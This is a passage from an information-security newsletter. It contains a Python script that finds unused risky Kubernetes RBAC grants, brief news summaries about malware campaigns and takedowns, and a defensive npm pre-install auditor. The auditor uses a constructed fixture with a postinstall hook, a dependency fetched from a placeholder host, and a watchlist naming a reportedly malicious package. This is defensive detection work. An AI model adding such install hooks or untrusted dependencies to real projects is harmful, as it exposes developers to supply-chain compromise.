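     "subjects": ["system:serviceaccount:payments:api", "alice@example.com"]},
]
# Constructed kube-apiserver audit events (JSON lines), a subset of the real schema.
AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {"user": {"username": "system:serviceaccount:payments:api"}, "verb": "get",
     "objectRef": {"resource": "pods", "namespace": "payments"},
     "requestReceivedTimestamp": "2025-10-18T09:12:03Z"},
    {"user": {"username": "system:serviceaccount:payments:api"}, "verb": "list",
     "objectRef": {"resource": "secrets", "namespace": "payments"},
     "requestReceivedTimestamp": "2025-10-19T22:40:11Z"},
    {"user": {"username": "alice@example.com"}, "verb": "get",
     "objectRef": {"resource": "pods", "namespace": "dev"},
     "requestReceivedTimestamp": "2025-10-17T08:00:00Z"},  # no matching grant; ignored
])


def flatten(roles, bindings):
    """Expand every binding into granular rows. '*' verbs become the concrete verbs
    so audit events can match them; ClusterRoleBindings get namespace '*'."""
    by_ref = {(r["kind"], r["name"]): r for r in roles}
    rows = set()
    for b in bindings:
        role = by_ref[(b["roleRef"]["kind"], b["roleRef"]["name"])]
        ns = b.get("namespace", "*")
        for rule in role["rules"]:
            verbs = ALL_VERBS if "*" in rule["verbs"] else rule["verbs"]
            for subject in b["subjects"]:
                for verb in verbs:
                    for resource in rule["resources"]:
                        rows.add((subject, verb, resource, ns))
    return rows


def last_used(rows, audit_log_text):
    """Map each row to the latest matching audit timestamp, or None if never seen.
    A cluster-wide row ('*') is satisfied by use in any namespace."""
    seen = {}
    for line in audit_log_text.splitlines():
        e = json.loads(line)
        ref = e["objectRef"]
        key = (e["user"]["username"], e["verb"], ref["resource"], ref.get("namespace", "*"))
        seen[key] = max(seen.get(key, ""), e["requestReceivedTimestamp"])  # ISO-8601 sorts lexically
    usage = {}
    for subject, verb, resource, ns in rows:
        hits = [ts for (u, v, r, n), ts in seen.items()
                if (u, v, r) == (subject, verb, resource) and (ns == "*" or n == ns)]
        usage[(subject, verb, resource, ns)] = max(hits) if hits else None
    return usage


def dangerous_unused(usage):
    """Rows worth removing first: never exercised and touching a sensitive resource."""
    return sorted(row for row, ts in usage.items()
                  if ts is None and row[2] in DANGEROUS_RESOURCES)


if __name__ == "__main__":
    usage = last_used(flatten(ROLES, BINDINGS), AUDIT_LOG)
    for subject, verb, resource, ns in dangerous_unused(usage):
        print(f"{subject}: {verb} {resource} in {ns} never used")
```

<p>On this input the service account has used exactly two of its twenty grants, and the human user has used none of her eight verbs on secrets; those unused secrets rows are the ones to cut first. Audit log retention bounds how far back "never used" can see, so compare against a window at least as long as the rarest legitimate job.</p>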
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fgithub.com%2Fise-uiuc%2FKNighter%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/to_drwEyFkK0G_ezh2bSyKUIxjxiGSt7alf3ArCOf8c=427">
<span>
<strong>KNighter (GitHub Repo)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
KNighter is an automated static analysis tool from UIUC that uses large language models to synthesize custom checkers from historical bug-fix commits in C/C++ codebases such as the Linux kernel. A three-stage pipeline (generation, refinement, triage) turns each patch into a Clang Static Analyzer (LLVM) checker for the bug pattern the patch fixed, tuned for finding real bugs in large codebases. It works with OpenAI, Claude, Google, and DeepSeek models and generates the rules directly from git history, so teams can hunt for as-yet-unknown instances of previously fixed bug classes.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fgithub.com%2FFuzzingLabs%2Ffuzzforge_ai%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/1y7ADiRfPhvnl9ce_ZHeGrysAm9o86wadhSZZrgpwuc=427">
<span>
<strong>Fuzzforge AI (GitHub Repo)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
Fuzzforge AI is an AI-powered workflow automation and agent platform for AppSec, fuzzing, and offensive security. It automates vulnerability discovery with intelligent fuzzing and AI-driven analysis and ships a marketplace of security tools.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">🎁</span></div></div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><h1><strong>Miscellaneous</strong></h1></div>
</div>
</td>
</tr>
</tbody>
</table>
<table bgcolor="" style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fthehackernews.com%2F2025%2F10%2Feuropol-dismantles-sim-farm-network.html%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/WiRaQgEqwcxv6ihH6vb1kgrr1DW57UFFANkl48gOmi8=427">
<span>
<strong>Europol Dismantles SIM Farm Network Powering 49 Million Fake Accounts Worldwide (3 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
Europol's Operation SIMCARTEL dismantled a cybercrime-as-a-service platform that ran SIM farms with 40,000 active SIM cards, enabling the creation of over 49 million fake online accounts used for phishing, investment fraud, and other crimes. The operation resulted in seven arrests, the seizure of 1,200 SIM box devices, the takedown of two websites, and the freezing of nearly €700,000 in assets across several countries. The takeaway for defenders: control of a phone number proves very little when criminals can rent tens of thousands of them, so SMS codes should not be the only gate on signup or authentication. Prefer app-based or phishing-resistant factors, and watch for SIM farm indicators such as bursts of registrations or verifications from the same number ranges.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fthehackernews.com%2F2025%2F10%2Fnorth-korean-hackers-combine-beavertail.html%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/E6MsXd6uCDzOqAWz3DlyGmeLU0DM3A9pHRSl4WRzT0s=427">
<span>
<strong>North Korean Hackers Combine BeaverTail and OtterCookie into Advanced JS Malware (5 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
North Korean threat actors behind the Contagious Interview campaign have merged their BeaverTail and OtterCookie malware families into a single, more capable JavaScript information stealer with improved keylogging, screenshot capture, and cryptocurrency wallet theft. It is delivered through fake job interview processes using malicious npm packages and other supply chain lures; newer variants such as OtterCandy add remote access trojan functionality and use blockchain-based command-and-control on Ethereum and BNB Smart Chain. Defenders should review the npm dependencies of any code they are asked to run, vet the technical assessments sent to job applicants, and watch for the reported indicators, including the "node-nvm-ssh" package and its associated file patterns.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
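<p>Reviewing the dependencies before running an unfamiliar Node project is something a script can do in seconds. As an added example (not code from the article or any vendor), the Python below audits a constructed package.json and package-lock.json the way you might before running a recruiter's "take-home assignment": it flags the one package name the article cites, any package whose lockfile entry carries npm's hasInstallScript flag (lockfile v2/v3 records this, so no tarball has to be unpacked), root-level install hooks, and dependencies resolved from outside the public registry or without an integrity hash. The package names other than node-nvm-ssh, the versions and the integrity values are placeholders, and the non-watchlist checks are general hygiene rules rather than indicators from the report.</p>

```python
"""Pre-install audit of a Node project you have been handed, for instance a
"take-home assignment" from a recruiter, aimed at the delivery tricks in the
BeaverTail/OtterCookie story: a watchlisted package, packages that run code
at install time, and dependencies pulled from outside the registry.

Added example for this digest, not code from the article or any vendor. The
package.json and package-lock.json are constructed. WATCHLIST holds the one
package name the article cites; the other checks are general hygiene rules,
not indicators from the report."""
import json
from urllib.parse import urlparse

WATCHLIST = {"node-nvm-ssh"}  # from the article; extend from your own threat intel
TRUSTED_HOSTS = {"registry.npmjs.org"}
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def audit(package_json_text: str, lock_json_text: str):
    """Return (package, reason) pairs; an empty list means nothing stood out."""
    findings = []
    pkg = json.loads(package_json_text)
    for hook in INSTALL_HOOKS:  # the project itself may run code the moment you `npm install`
        if hook in pkg.get("scripts", {}):
            findings.append(("<root>", f"runs `{hook}` on npm install: {pkg['scripts'][hook]}"))
    lock = json.loads(lock_json_text)
    if lock.get("lockfileVersion", 0) < 2:
        findings.append(("<root>", "lockfile v1 has no hasInstallScript flag; regenerate it first"))
    for path, meta in lock.get("packages", {}).items():
        if path == "":
            continue  # the root project's own entry
        name = path.split("node_modules/")[-1]  # works for nested and @scoped paths
        resolved = meta.get("resolved", "")
        if name in WATCHLIST:
            findings.append((name, "on watchlist"))
        if meta.get("hasInstallScript"):
            findings.append((name, "declares an install-time script"))
        if resolved:
            host = urlparse(resolved).hostname
            if host not in TRUSTED_HOSTS:
                findings.append((name, f"resolved from {host or resolved}"))
            if not meta.get("integrity"):
                findings.append((name, "no integrity hash"))
    return findings


# Constructed input. Integrity values are placeholders, not real hashes.
PACKAGE_JSON = json.dumps({
    "name": "interview-task", "version": "1.0.0",
    "scripts": {"start": "node server.js",
                "postinstall": "node -e \"require('./setup')\""},
    "dependencies": {"express": "^4.19.2", "node-nvm-ssh": "^1.0.2", "ui-kit-pro": "^2.1.0"},
})
PACKAGE_LOCK = json.dumps({
    "name": "interview-task", "lockfileVersion": 3,
    "packages": {
        "": {"name": "interview-task"},
        "node_modules/express": {
            "version": "4.19.2",
            "resolved": "https://registry.npmjs.org/express/-/express-4.19.2.tgz",
            "integrity": "sha512-placeholder"},
        "node_modules/node-nvm-ssh": {
            "version": "1.0.2",
            "resolved": "https://registry.npmjs.org/node-nvm-ssh/-/node-nvm-ssh-1.0.2.tgz",
            "integrity": "sha512-placeholder", "hasInstallScript": True},
        "node_modules/ui-kit-pro": {
            "version": "2.1.0",
            "resolved": "https://cdn.example.invalid/ui-kit-pro-2.1.0.tgz"},
    },
})

if __name__ == "__main__":
    for name, reason in audit(PACKAGE_JSON, PACKAGE_LOCK):
        print(f"{name}: {reason}")
```

<p>Run it before, not after, npm install; the whole point of an install-time hook is that the code runs before you get to look at it. A clean report is not a clearance, only the absence of the cheap tells.</p>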
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Flinks.tldrnewsletter.com%2FtZEIcc/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/wamOyDd4_yrbdMDHlHxkZaxk_C2UkVvy9LUhwyLjxVU=427">
<span>
<strong>Vanilla Tempest's Rhysida ransomware attacks foiled (1 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
Microsoft dismantled an attack campaign by Vanilla Tempest (also called Vice Society), which used fake Microsoft Teams installers and over 200 fraudulent certificates to spread the Rhysida ransomware. The attackers used malicious ads and SEO techniques to lure users, delivering malware that enabled data theft and additional payload delivery.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">⚡</span></div></div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;">
<h1><strong>Quick Links</strong></h1>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table bgcolor="" style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.intrusion.com%2Fintrusion-shield-cloud-for-aws-tldr%2F%3Futm_campaign=22505002-AWS_Launch_2025%26utm_source=TLDR%26utm_medium=102025/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/3bve8fykzG98iGs21F6tcnut433SKxbRSpyVGnzOHkk=427">
<span>
<strong>Stop managing firewall rules (Sponsor)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
Looking for advanced threat protection with a lean team? Intrusion Shield for AWS draws on 30 years of IP and domain reputation history to write its own network rules in real time. <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.intrusion.com%2Fintrusion-shield-cloud-for-aws-tldr%2F%3Futm_campaign=22505002-AWS_Launch_2025%26utm_source=TLDR%26utm_medium=102025/2/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/wObxEqH1PlvrYRGq-9KFsbQxjn-PF_Ju6qdULKt2tEQ=427" rel="noopener noreferrer nofollow" target="_blank"><span>Start your free trial.</span></a>
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Flinks.tldrnewsletter.com%2FPKsHwp/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/Kt9eKlUUC10f2aWY2JMCiIuDtyzClNRjv2Se7eVitTQ=427">
<span>
<strong>Beijing alleges “irrefutable evidence” linking US to major cyberattack on Chinese agency (2 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
China's State Security Ministry claims the NSA has been exploiting vulnerabilities in employees' mobile devices to gain unauthorized access to the National Time Service Center since 2022, using stolen credentials and 42 types of cyberattack tools to target the facility's timing systems and internal networks.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Flinks.tldrnewsletter.com%2FVBFkKX/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/T3tqx4TXsGfwf-_F3Hp9wLawFmSUngYRMV0Ox0p5HQk=427">
<span>
<strong>Collins Aerospace attack claimed by Everest, linking ransomware group to last month's European airport chaos (3 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;">
The Everest ransomware group claims responsibility for breaching Collins Aerospace's MUSE check-in software in September, allegedly exfiltrating 50GB of data and causing days of disruption at major European airports, including Heathrow, Brussels, Berlin, and Dublin, by forcing manual check-in operations.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td align="left" style="word-break: break-word; vertical-align: top; padding: 5px 10px;">
<p style="padding: 0; margin: 0; font-size: 22px; color: #000000; line-height: 1.6; font-weight: bold;">
Love TLDR? Tell your friends and get rewards!
</p>
</td>
</tr>
<tr>
<td class="container" style="padding: 0px 10px 15px;">
<div class="text-block">
Share your referral link below with friends to get free TLDR swag!
</div>
</td>
</tr>
<tr>
<td align="left" style="padding: 10px;">
<div class="text-block">
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frefer.tldr.tech%2F78de0e20%2F8/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/lChCTEX_sL6ydjNuCZ6GzhaFrvxTnAWj-ZKCes0Lt7s=427" style="color: #464ba4; text-decoration: underline;">https://refer.tldr.tech/78de0e20/8</a>
</div>
</td>
</tr>
<tr>
<td align="left" style="padding:5px 10px;">
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fhub.sparklp.co%2Fsub_d62447d5a74a%2F8/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/M6_kV_fDpGyKUni6XUuFRdOhdvXSI8r4_1uP9LbSY0E=427" style="font-size: 16px; line-height: 1.6; padding: 10px 0; display: inline-block; text-decoration: underline;"><span style="mso-text-raise:13pt; text-decoration: underline;">Track your referrals here.</span></a>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td align="left" style="word-break: break-word; vertical-align: top; padding: 5px 10px;">
<p style="padding: 0; margin: 0; font-size: 22px; color: #000000; line-height: 1.6; font-weight: bold;">
Want to advertise in TLDR? 📰
</p>
<div class="text-block" style="margin-top: 10px;">
If your company is interested in reaching an audience of cybersecurity professionals and decision makers, you may want to <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fadvertise.tldr.tech%2F%3Futm_source=tldrinfosec%26utm_medium=newsletter%26utm_campaign=advertisecta/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/aUneL38jfTHKnaUDYj83UeuW7csK87jwdRfXcyeUl5U=427"><strong><span>advertise with us</span></strong></a>.
</div>
<br>
<p style="padding: 0; margin: 0; font-size: 22px; color: #000000; line-height: 1.6; font-weight: bold;">
Want to work at TLDR? 💼
</p>
<div class="text-block" style="margin-top: 10px;">
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fjobs.ashbyhq.com%2Ftldr.tech/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/-IHp8hsFsdjTZazyLmvOfUFqi5bpoMjwv9hZDjRCi9U=427" rel="noopener noreferrer" style="color: #0000EE; text-decoration: underline;" target="_blank"><strong>Apply here</strong></a> or send a friend's resume to <a href="mailto:jobs@tldr.tech" style="color: #0000EE; text-decoration: underline;">jobs@tldr.tech</a> and get $1k if we hire them!
</div>
<br>
<div class="text-block">
If you have any comments or feedback, just respond to this email!
<br>
<br> Thanks for reading,
<br>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.linkedin.com%2Fin%2Fprasannagautam%2F/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/bkz73uQqtNXziw_gnPLGOhmDz8ziZm1BsWfnJeWaQnU=427"><span>Prasanna Gautam</span></a>, <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.linkedin.com%2Fin%2Fericfernandezdelcampo%2F/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/kqvyiMUU6QEoLJtqHjsPXydffePdX_-7b6BtAwUqUz0=427"><span>Eric Fernandez</span></a> & <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.linkedin.com%2Fin%2Fsammy-tbeile%2F/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/46eUGULHsZ-1knYWOxkyC1m5ZbUoBLVpDtlB8aR9l9g=427"><span>Sammy Tbeile</span></a>
<br>
<br>
</div>
<br>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block" id="testing-id">
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Ftldr.tech%2Finfosec%2Fmanage%3Femail=silk.theater.56%2540fwdnl.com/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/lgu4YZpQlNEHftn7BKOHzv5hnVoizpA0vXWgj5qqERE=427">Manage your subscriptions</a> to our other newsletters on tech, startups, and programming. Or if TLDR Information Security isn't for you, please <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fa.tldrnewsletter.com%2Funsubscribe%3Fep=1%26l=8d9cea11-3e94-11ed-9a32-0241b9615763%26lc=156924ca-84b7-11f0-8d58-47c5c04ad337%26p=dffbd6e8-ada1-11f0-aff1-39f1696b0a19%26pt=campaign%26pv=4%26spa=1760965321%26t=1760965664%26s=07465c1cca1569a7418eba2ab45ad4f9f62d51c52e6c52ed8a6dff530f04b89d/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/m25GVvM2kPyaUZXkCrs7kfXj_0abGL1Xsq6IoaL7Igw=427">unsubscribe</a>.
<br>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</body></html>